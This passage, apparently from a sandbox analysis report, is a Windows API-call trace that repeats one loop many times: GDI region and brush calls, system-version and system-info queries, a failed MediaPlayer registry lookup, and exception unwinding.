lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.250] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.250] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.251] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a0401d3 [0088.251] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x580401d6 [0088.251] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410fb [0088.251] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410fc [0088.251] CombineRgn (hrgnDst=0x10410fb, hrgnSrc1=0x5a0401d3, hrgnSrc2=0x580401d6, iMode=1) returned 1 [0088.251] CombineRgn (hrgnDst=0x10410fc, hrgnSrc1=0x5a0401d3, hrgnSrc2=0x580401d6, iMode=4) returned 2 [0088.251] CreateSolidBrush (color=0xff) returned 0x21010fa [0088.251] CreateSolidBrush (color=0xff0000) returned 0x11010fd [0088.251] DeleteObject (ho=0x11010fd) returned 1 [0088.251] DeleteObject (ho=0x580401d6) returned 1 [0088.251] DeleteObject (ho=0x5a0401d3) returned 1 [0088.251] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.251] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.251] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.251] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.251] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.251] BeginPath (hdc=0x0) returned 0 [0088.251] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.251] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.251] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.251] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.251] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.251] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.251] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.251] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.251] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x590401d6 [0088.251] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b0401d3 [0088.251] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410fe [0088.251] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ff [0088.252] CombineRgn (hrgnDst=0x10410fe, hrgnSrc1=0x590401d6, hrgnSrc2=0x5b0401d3, iMode=1) returned 1 [0088.252] CombineRgn (hrgnDst=0x10410ff, hrgnSrc1=0x590401d6, hrgnSrc2=0x5b0401d3, iMode=4) returned 2 [0088.252] CreateSolidBrush (color=0xff) returned 0x21010fd [0088.252] CreateSolidBrush (color=0xff0000) returned 0x1101100 [0088.252] DeleteObject (ho=0x1101100) returned 1 [0088.252] DeleteObject (ho=0x5b0401d3) returned 1 [0088.252] DeleteObject (ho=0x590401d6) returned 1 [0088.252] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.252] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.252] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.252] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.252] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.252] BeginPath (hdc=0x0) returned 0 [0088.252] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.252] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.252] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.252] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.252] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.252] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.252] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.252] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.252] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c0401d3 [0088.252] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a0401d6 [0088.252] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041101 [0088.252] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041102 [0088.252] CombineRgn (hrgnDst=0x1041101, hrgnSrc1=0x5c0401d3, hrgnSrc2=0x5a0401d6, iMode=1) returned 1 [0088.252] CombineRgn (hrgnDst=0x1041102, hrgnSrc1=0x5c0401d3, hrgnSrc2=0x5a0401d6, iMode=4) returned 2 [0088.252] CreateSolidBrush (color=0xff) returned 0x2101100 [0088.252] CreateSolidBrush (color=0xff0000) returned 0x1101103 [0088.252] DeleteObject (ho=0x1101103) returned 1 [0088.252] DeleteObject (ho=0x5a0401d6) returned 1 [0088.252] DeleteObject (ho=0x5c0401d3) returned 1 [0088.252] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.253] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.253] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.253] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.253] BeginPath (hdc=0x0) returned 0 [0088.253] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.253] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.253] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.253] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.253] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.253] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.253] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.253] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b0401d6 [0088.253] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d0401d3 [0088.253] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041104 [0088.253] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041105 [0088.253] CombineRgn (hrgnDst=0x1041104, hrgnSrc1=0x5b0401d6, hrgnSrc2=0x5d0401d3, iMode=1) returned 1 [0088.253] CombineRgn (hrgnDst=0x1041105, hrgnSrc1=0x5b0401d6, hrgnSrc2=0x5d0401d3, iMode=4) returned 2 [0088.253] CreateSolidBrush (color=0xff) returned 0x2101103 [0088.253] CreateSolidBrush (color=0xff0000) returned 0x1101106 [0088.253] DeleteObject (ho=0x1101106) returned 1 [0088.253] DeleteObject (ho=0x5d0401d3) returned 1 [0088.253] DeleteObject (ho=0x5b0401d6) returned 1 [0088.253] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.253] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.253] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.253] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.253] BeginPath (hdc=0x0) returned 0 [0088.254] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.254] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.254] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.254] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.254] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.254] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.254] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.254] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.254] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e0401d3 [0088.254] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c0401d6 [0088.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041107 [0088.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041108 [0088.254] CombineRgn (hrgnDst=0x1041107, hrgnSrc1=0x5e0401d3, hrgnSrc2=0x5c0401d6, iMode=1) returned 1 [0088.254] CombineRgn (hrgnDst=0x1041108, hrgnSrc1=0x5e0401d3, hrgnSrc2=0x5c0401d6, iMode=4) returned 2 [0088.254] CreateSolidBrush (color=0xff) returned 0x2101106 [0088.254] CreateSolidBrush (color=0xff0000) returned 0x1101109 [0088.254] DeleteObject (ho=0x1101109) returned 1 [0088.254] DeleteObject (ho=0x5c0401d6) returned 1 [0088.254] DeleteObject (ho=0x5e0401d3) returned 1 [0088.254] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.254] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.254] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.254] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.254] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.254] BeginPath (hdc=0x0) returned 0 [0088.254] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.254] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.254] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.254] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.254] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.254] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.254] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.255] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d0401d6 [0088.255] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f0401d3 [0088.255] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104110a [0088.255] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104110b [0088.255] CombineRgn (hrgnDst=0x104110a, hrgnSrc1=0x5d0401d6, hrgnSrc2=0x5f0401d3, iMode=1) returned 1 [0088.255] CombineRgn (hrgnDst=0x104110b, hrgnSrc1=0x5d0401d6, hrgnSrc2=0x5f0401d3, iMode=4) returned 2 [0088.255] CreateSolidBrush (color=0xff) returned 0x2101109 [0088.255] CreateSolidBrush (color=0xff0000) returned 0x110110c [0088.255] DeleteObject (ho=0x110110c) returned 1 [0088.255] DeleteObject (ho=0x5f0401d3) returned 1 [0088.255] DeleteObject (ho=0x5d0401d6) returned 1 [0088.255] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.255] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.255] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.255] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.255] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.255] BeginPath (hdc=0x0) returned 0 [0088.255] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.255] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.255] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.255] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.255] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.255] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.255] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.255] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x600401d3 [0088.255] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e0401d6 [0088.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104110d [0088.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104110e [0088.256] CombineRgn (hrgnDst=0x104110d, hrgnSrc1=0x600401d3, hrgnSrc2=0x5e0401d6, iMode=1) returned 1 [0088.256] CombineRgn (hrgnDst=0x104110e, hrgnSrc1=0x600401d3, hrgnSrc2=0x5e0401d6, iMode=4) returned 2 [0088.256] CreateSolidBrush (color=0xff) returned 0x210110c [0088.256] CreateSolidBrush (color=0xff0000) returned 0x110110f [0088.256] DeleteObject (ho=0x110110f) returned 1 [0088.256] DeleteObject (ho=0x5e0401d6) returned 1 [0088.256] DeleteObject (ho=0x600401d3) returned 1 [0088.256] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.256] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.256] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.256] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.256] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.256] BeginPath (hdc=0x0) returned 0 [0088.256] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.256] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.256] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.256] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.256] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.256] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.256] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.256] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f0401d6 [0088.256] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x610401d3 [0088.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041110 [0088.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041111 [0088.256] CombineRgn (hrgnDst=0x1041110, hrgnSrc1=0x5f0401d6, hrgnSrc2=0x610401d3, iMode=1) returned 1 [0088.256] CombineRgn (hrgnDst=0x1041111, hrgnSrc1=0x5f0401d6, hrgnSrc2=0x610401d3, iMode=4) returned 2 [0088.256] CreateSolidBrush (color=0xff) returned 0x210110f [0088.256] CreateSolidBrush (color=0xff0000) returned 0x1101112 [0088.256] DeleteObject (ho=0x1101112) returned 1 [0088.256] DeleteObject (ho=0x610401d3) returned 1 [0088.256] DeleteObject (ho=0x5f0401d6) returned 1 [0088.257] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.257] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.257] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.257] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.257] BeginPath (hdc=0x0) returned 0 [0088.257] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.257] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.257] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.257] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.257] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.257] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.257] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.257] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x620401d3 [0088.257] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x600401d6 [0088.257] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041113 [0088.257] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041114 [0088.257] CombineRgn (hrgnDst=0x1041113, hrgnSrc1=0x620401d3, hrgnSrc2=0x600401d6, iMode=1) returned 1 [0088.257] CombineRgn (hrgnDst=0x1041114, hrgnSrc1=0x620401d3, hrgnSrc2=0x600401d6, iMode=4) returned 2 [0088.257] CreateSolidBrush (color=0xff) returned 0x2101112 [0088.257] CreateSolidBrush (color=0xff0000) returned 0x1101115 [0088.257] DeleteObject (ho=0x1101115) returned 1 [0088.257] DeleteObject (ho=0x600401d6) returned 1 [0088.257] DeleteObject (ho=0x620401d3) returned 1 [0088.257] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.257] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.257] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.257] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.258] BeginPath (hdc=0x0) returned 0 [0088.258] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.258] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.258] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.258] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.258] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.258] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.258] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.258] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.258] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x610401d6 [0088.258] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x630401d3 [0088.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041116 [0088.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041117 [0088.258] CombineRgn (hrgnDst=0x1041116, hrgnSrc1=0x610401d6, hrgnSrc2=0x630401d3, iMode=1) returned 1 [0088.258] CombineRgn (hrgnDst=0x1041117, hrgnSrc1=0x610401d6, hrgnSrc2=0x630401d3, iMode=4) returned 2 [0088.258] CreateSolidBrush (color=0xff) returned 0x2101115 [0088.258] CreateSolidBrush (color=0xff0000) returned 0x1101118 